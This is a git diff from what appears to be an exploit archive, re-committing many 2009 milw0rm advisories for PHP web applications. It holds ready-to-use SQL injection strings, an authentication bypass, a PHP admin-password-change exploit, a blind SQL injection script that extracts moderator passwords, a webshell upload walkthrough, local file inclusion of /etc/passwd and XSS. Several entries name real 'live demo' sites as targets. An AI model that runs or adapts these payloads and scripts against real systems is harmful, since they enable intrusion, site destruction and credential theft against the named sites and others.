-#Download : http://www.conpresso.de/conpresso/de_downloads/index.php?rubric=Download
-#
-#=======================================================================================================================
-#
-#
-#Exploit :
-#--------------------------------
-#
-#www.[URL]/[PATH]/detail.php?nr=[nr] and 1=1
-#www.[URL]/[PATH]/detail.php?nr=[nr] and 1=0
-#
-#Live demo :
-#--------------------------------
-#
-#http://www.maria-pawlowna.de/conpresso/Home/detail.php?nr=70+and+1=1
-#http://www.muenster.org/hittorf/hittorf/Schulleben/detail.php?nr=6501+and+1=0
-#
-#=======================================================================================================================
-#Discovered by : -tmh-
-#
-#Contact : tmh[at]no-trace.cc
-#
-#Greetz to : Team-Internet
-#
-#
-########################################################################################################################
-
-# milw0rm.com [2009-07-02]
+########################################################################################################################
+#conpresso 3.4.8 (detail.php) Remote Blind SQL Injection Exploit
+#=======================================================================================================================
+#
+#Critical Level : Dangerous
+#
+#Vendor site : http://www.conpresso.de/
+#
+#Download : http://www.conpresso.de/conpresso/de_downloads/index.php?rubric=Download
+#
+#=======================================================================================================================
+#
+#
+#Exploit :
+#--------------------------------
+#
+#www.[URL]/[PATH]/detail.php?nr=[nr] and 1=1
+#www.[URL]/[PATH]/detail.php?nr=[nr] and 1=0
+#
+#Live demo :
+#--------------------------------
+#
+#http://www.maria-pawlowna.de/conpresso/Home/detail.php?nr=70+and+1=1
+#http://www.muenster.org/hittorf/hittorf/Schulleben/detail.php?nr=6501+and+1=0
+#
+#=======================================================================================================================
+#Discovered by : -tmh-
+#
+#Contact : tmh[at]no-trace.cc
+#
+#Greetz to : Team-Internet
+#
+#
+########################################################################################################################
+
+# milw0rm.com [2009-07-02]
diff --git a/platforms/php/webapps/9079.txt b/platforms/php/webapps/9079.txt
index 39db3a6cb..590b175fa 100755
--- a/platforms/php/webapps/9079.txt
+++ b/platforms/php/webapps/9079.txt
@@ -1,49 +1,49 @@ -########################################################################### -#-----------------------------I AM MUSLIM !!------------------------------# -########################################################################### - -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - [»] ~Fleck i love you :D hahaha -============================================================================== - [»] Opial Version 1.0 (Auth Bypass) Remote Sql Injection -============================================================================== - - [»] Script: [ Opial Version 1.0 ] - [»] Language: [ PHP ] - [»] Download: [ http://www.opial.com/ ] - [»] Founder: [ Moudi or SixSo ] - [»] Thanks to: [ MiZoZ , ZuKa , str0ke , and all hackers... 
] - [»] Team: [ EvilWay ] - [»] SiteWeb: [ Visit - www.opensc.ws ] - [»] Price: [ $35 - $155 ] - -########################################################################### - -===[ Exploit SQL ]=== - - [»] http://www.site.com/patch/admin/ - - [»] User Name : admin' or '1=1 - [»] Password : leave empty here - -===[ LIVE DEMO ]=== - - [»] http://www.opial.com/demo/admin/ - - [»] User Name : admin' or '1=1 - [»] Password : - - -Author: Moudi - -########################################################################### - -# milw0rm.com [2009-07-02] +########################################################################### +#-----------------------------I AM MUSLIM !!------------------------------# +########################################################################### + +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + [»] ~Fleck i love you :D hahaha +============================================================================== + [»] Opial Version 1.0 (Auth Bypass) Remote Sql Injection +============================================================================== + + [»] Script: [ Opial Version 1.0 ] + [»] Language: [ PHP ] + [»] Download: [ http://www.opial.com/ ] + [»] Founder: [ Moudi or SixSo ] + [»] Thanks to: [ MiZoZ , ZuKa , str0ke , and all hackers... 
] + [»] Team: [ EvilWay ] + [»] SiteWeb: [ Visit - www.opensc.ws ] + [»] Price: [ $35 - $155 ] + +########################################################################### + +===[ Exploit SQL ]=== + + [»] http://www.site.com/patch/admin/ + + [»] User Name : admin' or '1=1 + [»] Password : leave empty here + +===[ LIVE DEMO ]=== + + [»] http://www.opial.com/demo/admin/ + + [»] User Name : admin' or '1=1 + [»] Password : + + +Author: Moudi + +########################################################################### + +# milw0rm.com [2009-07-02] diff --git a/platforms/php/webapps/9080.txt b/platforms/php/webapps/9080.txt index d1f007138..84ed3a29b 100755 --- a/platforms/php/webapps/9080.txt +++ b/platforms/php/webapps/9080.txt 
@@ -1,19 +1,19 @@
-###################################################################
-###################################################################
-Opial 1.0 (albumid) Remote SQL Injection Vuln
-###################################################################
-Founder : ThE g0bL!N
-###################################################################
-###################################################################
-SQL Injection Vulnerability
-###################################################################
-Exploit:
-###################################################################
-http://www.path.com/albumdetail.php?albumid=-31+union/**/select/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,user(),16--
-Demo:
-----
-http://www.opial.com/demo/
-####################################################################
-Greeting : Super_Ctistal (My Master) And all Muslims&algerian Hackers
-
-# milw0rm.com [2009-07-02]
+###################################################################
+###################################################################
+Opial 1.0 (albumid) Remote SQL Injection Vuln
+###################################################################
+Founder : ThE g0bL!N
+###################################################################
+###################################################################
+SQL Injection Vulnerability
+###################################################################
+Exploit:
+###################################################################
+http://www.path.com/albumdetail.php?albumid=-31+union/**/select/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,user(),16--
+Demo:
+----
+http://www.opial.com/demo/
+####################################################################
+Greeting : Super_Ctistal (My Master) And all Muslims&algerian Hackers
+
+# milw0rm.com [2009-07-02]
diff --git a/platforms/php/webapps/9081.txt b/platforms/php/webapps/9081.txt
index 11ae2199c..161650060 100755
--- a/platforms/php/webapps/9081.txt
+++ b/platforms/php/webapps/9081.txt
@@ -1,51 +1,51 @@ -########################################################################### -#-----------------------------I AM MUSLIM !!------------------------------# -########################################################################### - -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - [»] ~Fleck i love you :D hahaha -============================================================================== - [»] Rentventory PHP (SQL/Blind) Multiple Vulnerabilities -============================================================================== - - [»] Script: [ Rentventory ] - [»] Language: [ PHP ] - [»] Download: [ http://www.rentventory.com/ ] - [»] Founder: [ Moudi or SixSo ] - [»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em man .... 
] - [»] Team: [ EvilWay ] - [»] SiteWeb: [ Visit - www.opensc.ws ] - [»] Price: [ $39 ] - -########################################################################### - -===[ Exploit SQL ]=== - - [»] http://www.site.com/patch/?product=[SQL]&panel=rent%2Fselect_time - -===[ LIVE DEMO ]=== - - [»] http://www.rentventory.com/demo/?product=null+union+select+1,2,version(),4,5,6,7,8,9,10,11,12&panel=rent%2Fselect_time - -===[ Exploit BLIND SQL ]=== - - [»] http://www.site.com/patch/?product=[BLIND]&panel=rent%2Fselect_time - -===[ LIVE DEMO ]=== - - [»] http://www.rentventory.com/demo/?product=1+AND+SUBSTRING(@@version,1,1)=5&panel=rent%2Fselect_time - - -Author: Moudi - -########################################################################### - -# milw0rm.com [2009-07-02] +########################################################################### +#-----------------------------I AM MUSLIM !!------------------------------# +########################################################################### + +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + [»] ~Fleck i love you :D hahaha +============================================================================== + [»] Rentventory PHP (SQL/Blind) Multiple Vulnerabilities +============================================================================== + + [»] Script: [ Rentventory ] + [»] Language: [ PHP ] + [»] Download: [ http://www.rentventory.com/ ] + [»] Founder: [ Moudi or SixSo ] + [»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em man .... 
] + [»] Team: [ EvilWay ] + [»] SiteWeb: [ Visit - www.opensc.ws ] + [»] Price: [ $39 ] + +########################################################################### + +===[ Exploit SQL ]=== + + [»] http://www.site.com/patch/?product=[SQL]&panel=rent%2Fselect_time + +===[ LIVE DEMO ]=== + + [»] http://www.rentventory.com/demo/?product=null+union+select+1,2,version(),4,5,6,7,8,9,10,11,12&panel=rent%2Fselect_time + +===[ Exploit BLIND SQL ]=== + + [»] http://www.site.com/patch/?product=[BLIND]&panel=rent%2Fselect_time + +===[ LIVE DEMO ]=== + + [»] http://www.rentventory.com/demo/?product=1+AND+SUBSTRING(@@version,1,1)=5&panel=rent%2Fselect_time + + +Author: Moudi + +########################################################################### + +# milw0rm.com [2009-07-02] diff --git a/platforms/php/webapps/9086.txt b/platforms/php/webapps/9086.txt index 20eb5e98c..88ee1e298 100755 --- a/platforms/php/webapps/9086.txt +++ b/platforms/php/webapps/9086.txt 
@@ -1,24 +1,24 @@ -################################################################################################################# -[+] MRCGIGUY Thumbnail Gallery Post 1b Remote File Upload Vuln -[+] Discovered By ThE g0bL!N -[+] Vendor:http://www.mrcgiguy.com/ -[+} Download:http://www.mrcgiguy.com/cgi-bin/freedown.cgi?id=6 -[+] Greets : SarBoT511 -Sub-ZeRo -[+] Note: It is a Sex Site Thanx God For This Bug :) -################################################################################################################# -Exploit: -------- - 1)Go To add Your Picture http://www.site.com/path/submit.cgi - 2) Upload Your Shell.php - 3) Image Properties And The link Of shell :) - Exapmle: - ------- - http://site.com/upload/68456_shell1.php - Demo: - ---- -http://www.myhotlinks.net/cgi-bin/tgp/submit.cgi - - Hack it please :d -################################################################################################################ - -# milw0rm.com [2009-07-09] +################################################################################################################# +[+] MRCGIGUY Thumbnail Gallery Post 1b Remote File Upload Vuln +[+] Discovered By ThE g0bL!N +[+] Vendor:http://www.mrcgiguy.com/ +[+} Download:http://www.mrcgiguy.com/cgi-bin/freedown.cgi?id=6 +[+] Greets : SarBoT511 -Sub-ZeRo +[+] Note: It is a Sex Site Thanx God For This Bug :) +################################################################################################################# +Exploit: +------- + 1)Go To add Your Picture http://www.site.com/path/submit.cgi + 2) Upload Your Shell.php + 3) Image Properties And The link Of shell :) + Exapmle: + ------- + http://site.com/upload/68456_shell1.php + Demo: + ---- +http://www.myhotlinks.net/cgi-bin/tgp/submit.cgi + + Hack it please :d +################################################################################################################ + +# milw0rm.com [2009-07-09] 
diff --git a/platforms/php/webapps/9087.php b/platforms/php/webapps/9087.php index 1004634db..0b084a524 100755 --- a/platforms/php/webapps/9087.php +++ b/platforms/php/webapps/9087.php 
@@ -1,150 +1,150 @@ -......................"; - }else{ - - [/code] - - [-] Works On : - - 1. Nwahy Articles v1 - - 2. Nwahy scripts v1 - - 3. Nwahy book v1 - - [-] Note : Path to Control Panel "/admincp/" . - - */ - - error_reporting(0); - ini_set("max_execution_time",0); - ini_set("default_socket_timeout",5); - - - function Usage() - { - print "\n\n"; - print "/------------------------------------------------------------\\\n"; - print "| Nwahy Dir v2.1 Change Admin Password Exploit |\n"; - print "\------------------------------------------------------------/\n"; - print "| [-] Author : rEcruit |\n"; - print "| [-] Mail : recru1t@ymail.com |\n"; - print "| [-] Greetz : RAGE SCREAM , SAUDI L0rD , Fantastic Egypt |\n"; - print "\------------------------------------------------------------/\n"; - print "| [-] Dork : Nwahy.com 2.1 , inurl:'add-site.html' |\n"; - print "| [+] Usage : php Exploit.php HOST PATH Options |\n"; - print "| [-] HOST : Target server (ip/hostname) |\n"; - print "| [-] PATH : Path to Nwahy Dir |\n"; - print "| [-] Options : |\n"; - print "| =>Proxy :(ex. 
0.0.0.0:8080) |\n"; - print "\------------------------------------------------------------/\n"; - print "\n\n"; - - exit; - } - - - function Send() - { - Global $host,$path,$user,$pwd,$proxy; - - if(empty($proxy)) - { - $Connect = @fsockopen($host,"80") or die("[-] Bad Host ."); - }else{ - $proxy = explode(":",$proxy); - $Connect = @fsockopen($proxy[0],$proxy[1]) or die("[-] Bad Proxy ."); - } - - $Payload = "username={$user}&password={$pwd}"; - $Packet .= "POST {$path}/admincp/admininfo.php?action=edit HTTP/1.1 \r\n"; - $Packet .= "Host: {$host}\r\n"; - $Packet .= "Cookie: username={$user}\r\n"; - $Packet .= "X-Forwarded-For: 127.0.0.1\r\n"; - $Packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; - $Packet .= "Content-Length: ".(strlen($Payload))."\r\n"; - $Packet .= "Connection: close\r\n\r\n"; - $Packet .= $Payload; - - fputs($Connect,$Packet); - - while(!feof($Connect)) - $Response .= @fgets($Connect,2048); - - fclose($Connect); - - return $Response; - } - - - function Login() - { - $Response = @Send(); - - if(eregi("refresh",$Response)) - { - $msg = "[-] Password changed .\n"; - } - elseif(eregi("
    ",$Response)) - { - $msg = "[-] Bad username .\n"; - } - else - { - $msg = "[-] Exploit failed .\n"; - } - - return $msg; - } - - - - if ($argc < 3) Usage(); - - $host = $argv[1]; - $path = $argv[2];; - $proxy = $argv[3]; - - - Print "\r\n[-] Connecting to {$host} .... \r\n"; - - while(1) - { - Print "[-] Username: "; - - if($user = str_replace (" ", "%20", trim(fgets(STDIN)))) - { - Print "[-] New password: "; - - if($pwd = str_replace (" ", "%20", trim(fgets(STDIN)))) - { - Print Login(); - exit; - } - - - } - - - } //end while - -?> - -# milw0rm.com [2009-07-09] +......................
    "; + }else{ + + [/code] + + [-] Works On : + + 1. Nwahy Articles v1 + + 2. Nwahy scripts v1 + + 3. Nwahy book v1 + + [-] Note : Path to Control Panel "/admincp/" . + + */ + + error_reporting(0); + ini_set("max_execution_time",0); + ini_set("default_socket_timeout",5); + + + function Usage() + { + print "\n\n"; + print "/------------------------------------------------------------\\\n"; + print "| Nwahy Dir v2.1 Change Admin Password Exploit |\n"; + print "\------------------------------------------------------------/\n"; + print "| [-] Author : rEcruit |\n"; + print "| [-] Mail : recru1t@ymail.com |\n"; + print "| [-] Greetz : RAGE SCREAM , SAUDI L0rD , Fantastic Egypt |\n"; + print "\------------------------------------------------------------/\n"; + print "| [-] Dork : Nwahy.com 2.1 , inurl:'add-site.html' |\n"; + print "| [+] Usage : php Exploit.php HOST PATH Options |\n"; + print "| [-] HOST : Target server (ip/hostname) |\n"; + print "| [-] PATH : Path to Nwahy Dir |\n"; + print "| [-] Options : |\n"; + print "| =>Proxy :(ex. 
0.0.0.0:8080) |\n"; + print "\------------------------------------------------------------/\n"; + print "\n\n"; + + exit; + } + + + function Send() + { + Global $host,$path,$user,$pwd,$proxy; + + if(empty($proxy)) + { + $Connect = @fsockopen($host,"80") or die("[-] Bad Host ."); + }else{ + $proxy = explode(":",$proxy); + $Connect = @fsockopen($proxy[0],$proxy[1]) or die("[-] Bad Proxy ."); + } + + $Payload = "username={$user}&password={$pwd}"; + $Packet .= "POST {$path}/admincp/admininfo.php?action=edit HTTP/1.1 \r\n"; + $Packet .= "Host: {$host}\r\n"; + $Packet .= "Cookie: username={$user}\r\n"; + $Packet .= "X-Forwarded-For: 127.0.0.1\r\n"; + $Packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; + $Packet .= "Content-Length: ".(strlen($Payload))."\r\n"; + $Packet .= "Connection: close\r\n\r\n"; + $Packet .= $Payload; + + fputs($Connect,$Packet); + + while(!feof($Connect)) + $Response .= @fgets($Connect,2048); + + fclose($Connect); + + return $Response; + } + + + function Login() + { + $Response = @Send(); + + if(eregi("refresh",$Response)) + { + $msg = "[-] Password changed .\n"; + } + elseif(eregi("
    ",$Response)) + { + $msg = "[-] Bad username .\n"; + } + else + { + $msg = "[-] Exploit failed .\n"; + } + + return $msg; + } + + + + if ($argc < 3) Usage(); + + $host = $argv[1]; + $path = $argv[2];; + $proxy = $argv[3]; + + + Print "\r\n[-] Connecting to {$host} .... \r\n"; + + while(1) + { + Print "[-] Username: "; + + if($user = str_replace (" ", "%20", trim(fgets(STDIN)))) + { + Print "[-] New password: "; + + if($pwd = str_replace (" ", "%20", trim(fgets(STDIN)))) + { + Print Login(); + exit; + } + + + } + + + } //end while + +?> + +# milw0rm.com [2009-07-09] diff --git a/platforms/php/webapps/9088.txt b/platforms/php/webapps/9088.txt index 91359efd9..177e03843 100755 --- a/platforms/php/webapps/9088.txt +++ b/platforms/php/webapps/9088.txt 
@@ -1,49 +1,49 @@ -##################################################### -#----------------------------- Evil-Cod3r -------------------------------# -#################################################### -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - &n bsp; - -============================================================================== - [»] ~ Note : n0 Friends =< -============================================================================== - [»] Glossword Version 1.8.11 (Uninstall/install) Script Vlun -============================================================================== - - [»] Script: [ Glossword Version 1.8.11 ] - [»] Language: [ PHP ] - [»] Download: [ http://code.google.com/p/glossword/downloads/list ] - [»] Founder: [ Evil-Cod3r ] - [»] Gr44tz to: [ The G0bl!n - v4-Team.Com members - Qabandi - Fl!x-Os - Mr.SaFa7 ] - [»] Team: [ v4-Team ] - [»] SiteWeb: [ Visit - v4-Team.Com - Creativexploit.Com ] - [»] Price: [ Free ] - -########################################################################### - -===[ Exploit To Uninstall The Script ]=== - - [»] http://www.Site.com/path/gw_install/index.php?arg[il]=english&arg[target]=uninstall - -== [ Exploit To New installation The Script ] == - - [»] http://www.Path.com/path/gw_instal l/index.php?arg[il]=english&arg[target]=install - -===[ LIVE DEMO ]=== - - [»] http://www.dataord.com - - [»] Uninstall : http://www.dataord.com/gw_install/index.php?arg[il]=english&arg[target]=uninstall - [»] installation : http://www.dataord.com/gw_install/index.php?arg[il]=english&arg[target]=install - - -Author: Evil-Cod3r <- - -########################################################################### - -# milw0rm.com [2009-07-09] +##################################################### +#----------------------------- 
Evil-Cod3r -------------------------------# +#################################################### +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + &n bsp; + +============================================================================== + [»] ~ Note : n0 Friends =< +============================================================================== + [»] Glossword Version 1.8.11 (Uninstall/install) Script Vlun +============================================================================== + + [»] Script: [ Glossword Version 1.8.11 ] + [»] Language: [ PHP ] + [»] Download: [ http://code.google.com/p/glossword/downloads/list ] + [»] Founder: [ Evil-Cod3r ] + [»] Gr44tz to: [ The G0bl!n - v4-Team.Com members - Qabandi - Fl!x-Os - Mr.SaFa7 ] + [»] Team: [ v4-Team ] + [»] SiteWeb: [ Visit - v4-Team.Com - Creativexploit.Com ] + [»] Price: [ Free ] + +########################################################################### + +===[ Exploit To Uninstall The Script ]=== + + [»] http://www.Site.com/path/gw_install/index.php?arg[il]=english&arg[target]=uninstall + +== [ Exploit To New installation The Script ] == + + [»] http://www.Path.com/path/gw_instal l/index.php?arg[il]=english&arg[target]=install + +===[ LIVE DEMO ]=== + + [»] http://www.dataord.com + + [»] Uninstall : http://www.dataord.com/gw_install/index.php?arg[il]=english&arg[target]=uninstall + [»] installation : http://www.dataord.com/gw_install/index.php?arg[il]=english&arg[target]=install + + +Author: Evil-Cod3r <- + +########################################################################### + +# milw0rm.com [2009-07-09] diff --git a/platforms/php/webapps/9089.txt b/platforms/php/webapps/9089.txt index 10b5800b2..2674496a6 100755 --- a/platforms/php/webapps/9089.txt +++ b/platforms/php/webapps/9089.txt 
@@ -1,31 +1,31 @@
-----------------------------------------------------------------------------------------------------
-
- Name : ClearContent
- Site : http://www.allisclear.com/
-
- Demo : http://demo.allisclear.com/
-
-----------------------------------------------------------------------------------------------------
-
-
- Found By : MizoZ [EvilWay Team]
-
- Made in : Morocco
- Contact : mizozx[at]gmail[dot]com
- Greetz : Moudi , Zuka , All friends
-
-
-----------------------------------------------------------------------------------------------------
-
-
- P0c:
-
- LFI: http://demo.allisclear.com/image.php?url=../../../../../../../../../../etc/passwd
- RFI: http://demo.allisclear.com/image.php?url=[EVIL_CODE]???
-
-
- RFI needs register_globals=on;
-
-----------------------------------------------------------------------------------------------------
-
-# milw0rm.com [2009-07-09]
+----------------------------------------------------------------------------------------------------
+
+ Name : ClearContent
+ Site : http://www.allisclear.com/
+
+ Demo : http://demo.allisclear.com/
+
+----------------------------------------------------------------------------------------------------
+
+
+ Found By : MizoZ [EvilWay Team]
+
+ Made in : Morocco
+ Contact : mizozx[at]gmail[dot]com
+ Greetz : Moudi , Zuka , All friends
+
+
+----------------------------------------------------------------------------------------------------
+
+
+ P0c:
+
+ LFI: http://demo.allisclear.com/image.php?url=../../../../../../../../../../etc/passwd
+ RFI: http://demo.allisclear.com/image.php?url=[EVIL_CODE]???
+
+
+ RFI needs register_globals=on;
+
+----------------------------------------------------------------------------------------------------
+
+# milw0rm.com [2009-07-09]
diff --git a/platforms/php/webapps/9091.php b/platforms/php/webapps/9091.php
index 4a73cea4f..eeb8b5687 100755
--- a/platforms/php/webapps/9091.php
+++ b/platforms/php/webapps/9091.php
@@ -1,201 +1,201 @@ - 2) { - -echo "\nPlease wait, this will take time, el9abr zain ;)\n"; -$r = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='1")); -echo "\nExploiting:\n"; -$w = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='0")); -$t = abs((100-($w/$r*100))); -echo "Username: "; -for ($i=1; $i <= 30; $i++) { - - $q = QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from mlffat_moderators limit 0,1),".$i.",1))!='0"); - -$laenge = strlen($q); - if (abs((100-($laenge/$r*100))) > $t-1) { - $count = $i; - $i = 30; - } -} -for ($j = 1; $j < $count; $j++) { - for ($i = 46; $i <= 122; $i=$i+2) { - if ($i == 60) { - $i = 98; - } - - - - $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from mlffat_moderators limit 0,1),".$j.",1))>'".$i)); - - - - if (abs((100-($laenge/$r*100))) > $t-1) { - - - - - $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from mlffat_moderators limit 0,1),".$j.",1))>'".($i-1))); - - - - - - - - if (abs((100-($laenge/$r*100))) > $t-1) { - echo chr($i-1); - } else { - echo chr($i); - } - $i = 122; - } - } -} -echo "\nPassword: "; -for ($j = 1; $j <= 49; $j++) { - for ($i = 46; $i <= 102; $i=$i+2) { - if ($i == 60) { - $i = 98; - } - - - // if ($j>9){ - - // $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from mlffat_moderators limit 0,1),".$j.",1)) > '".$i); - - - // } - - // if ($j<9){ - - // $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from mlffat_moderators limit 0,1),".$j.",1)) > '".$i); - - - // } - // if ($j=9){ - - $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from mlffat_moderators limit 0,1),".$j.",1)) > '".$i,1); - - - // } - - $laenge = strlen($hg); - - if 
(abs((100-($laenge/$r*100))) > $t-1) { - - - - $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from mlffat_moderators limit 0,1),".$j.",1)) > '".($i-1),1)); - - - if (abs((100-($laenge/$r*100))) > $t-1) { - echo chr($i-1); - } else { - echo chr($i); - } - $i = 102; - } - } -} -} -?> - -# milw0rm.com [2009-07-09] + 2) { + +echo "\nPlease wait, this will take time, el9abr zain ;)\n"; +$r = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='1")); +echo "\nExploiting:\n"; +$w = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='0")); +$t = abs((100-($w/$r*100))); +echo "Username: "; +for ($i=1; $i <= 30; $i++) { + + $q = QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from mlffat_moderators limit 0,1),".$i.",1))!='0"); + +$laenge = strlen($q); + if (abs((100-($laenge/$r*100))) > $t-1) { + $count = $i; + $i = 30; + } +} +for ($j = 1; $j < $count; $j++) { + for ($i = 46; $i <= 122; $i=$i+2) { + if ($i == 60) { + $i = 98; + } + + + + $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from mlffat_moderators limit 0,1),".$j.",1))>'".$i)); + + + + if (abs((100-($laenge/$r*100))) > $t-1) { + + + + + $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from mlffat_moderators limit 0,1),".$j.",1))>'".($i-1))); + + + + + + + + if (abs((100-($laenge/$r*100))) > $t-1) { + echo chr($i-1); + } else { + echo chr($i); + } + $i = 122; + } + } +} +echo "\nPassword: "; +for ($j = 1; $j <= 49; $j++) { + for ($i = 46; $i <= 102; $i=$i+2) { + if ($i == 60) { + $i = 98; + } + + + // if ($j>9){ + + // $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from mlffat_moderators limit 0,1),".$j.",1)) > '".$i); + + + // } + + // if ($j<9){ + + // 
$hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from mlffat_moderators limit 0,1),".$j.",1)) > '".$i); + + + // } + // if ($j=9){ + + $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from mlffat_moderators limit 0,1),".$j.",1)) > '".$i,1); + + + // } + + $laenge = strlen($hg); + + if (abs((100-($laenge/$r*100))) > $t-1) { + + + + $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from mlffat_moderators limit 0,1),".$j.",1)) > '".($i-1),1)); + + + if (abs((100-($laenge/$r*100))) > $t-1) { + echo chr($i-1); + } else { + echo chr($i); + } + $i = 102; + } + } +} +} +?> + +# milw0rm.com [2009-07-09] diff --git a/platforms/php/webapps/9092.txt b/platforms/php/webapps/9092.txt index ca1f2bc3f..85ce72be6 100755 --- a/platforms/php/webapps/9092.txt +++ b/platforms/php/webapps/9092.txt 
@@ -1,40 +1,40 @@ - ============================================================================================= - - Title : (Blind SQL/XSS) Multiple Remote Vulnerabilities - Software : WebAsyst Shop-Script - Vendor : http://www.webasyst.net - - Date : 03 July 2009 (Indonesia) - Author : Vrs-hCk - Contact : d00r@telkom.net - Blog : http://c0li.blogspot.com/ - - ============================================================================================= - - [-] Google Dork - - "Powered by WebAsyst Shop-Script" - - [-] Vulnerable (Blind SQL/XSS) - - index.php - - [-] Exploit (Blind SQL) - - http://[site]/[path]/index.php?ukey=news&blog_id=null and substring(@@version,1,1)=null - - [-] Exploit (XSS) - - http://[site]/[path]/index.php?ukey=news&blog_id= - - ============================================================================================= - - Greetz : - - Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy, - bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh buat Dia yg Ku Cintai (*_^) - c0li.m0de.0n and Behave oR BeGone !!! 
- - ============================================================================================= - -# milw0rm.com [2009-07-09] + ============================================================================================= + + Title : (Blind SQL/XSS) Multiple Remote Vulnerabilities + Software : WebAsyst Shop-Script + Vendor : http://www.webasyst.net + + Date : 03 July 2009 (Indonesia) + Author : Vrs-hCk + Contact : d00r@telkom.net + Blog : http://c0li.blogspot.com/ + + ============================================================================================= + + [-] Google Dork + + "Powered by WebAsyst Shop-Script" + + [-] Vulnerable (Blind SQL/XSS) + + index.php + + [-] Exploit (Blind SQL) + + http://[site]/[path]/index.php?ukey=news&blog_id=null and substring(@@version,1,1)=null + + [-] Exploit (XSS) + + http://[site]/[path]/index.php?ukey=news&blog_id= + + ============================================================================================= + + Greetz : + + Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy, + bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh buat Dia yg Ku Cintai (*_^) + c0li.m0de.0n and Behave oR BeGone !!! + + ============================================================================================= + +# milw0rm.com [2009-07-09] diff --git a/platforms/php/webapps/9094.txt b/platforms/php/webapps/9094.txt index 1991cbb61..92830a452 100755 --- a/platforms/php/webapps/9094.txt +++ b/platforms/php/webapps/9094.txt 
@@ -1,35 +1,35 @@
-========================================================
-
-==> EasyVillaRentalSite (id) Remote SQL Injection Vulnerability
-
-========================================================
-
-==> AuThOr : BazOka-HaCkEr
-
-==> EmaiL : wuo@hotmail.com
-
-==> HomE : www.TrYaG.cc/cc
-
-========================================================
-
-==> Product Page :
-
-==> http://easyvillarentalsite.com
-
-==> ExplO!te :
-
-==> show_category.php?Id=-2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),0x3a,database(),0x3a,version())--
-
-==> L!ve D3mo :
-
-==> http://easyvillarentalsite.com/demo/show_category.php?Id=-2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),0x3a,database(),0x3a,version())--
-
-=========================================================
-
-==> GreeTz :
-
-==> FeezO , Abu-Mahdi , MoGaTiL , Str0ke , TrYaG TeaM
-
-=========================================================
-
-# milw0rm.com [2009-07-09]
+========================================================
+
+==> EasyVillaRentalSite (id) Remote SQL Injection Vulnerability
+
+========================================================
+
+==> AuThOr : BazOka-HaCkEr
+
+==> EmaiL : wuo@hotmail.com
+
+==> HomE : www.TrYaG.cc/cc
+
+========================================================
+
+==> Product Page :
+
+==> http://easyvillarentalsite.com
+
+==> ExplO!te :
+
+==> show_category.php?Id=-2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),0x3a,database(),0x3a,version())--
+
+==> L!ve D3mo :
+
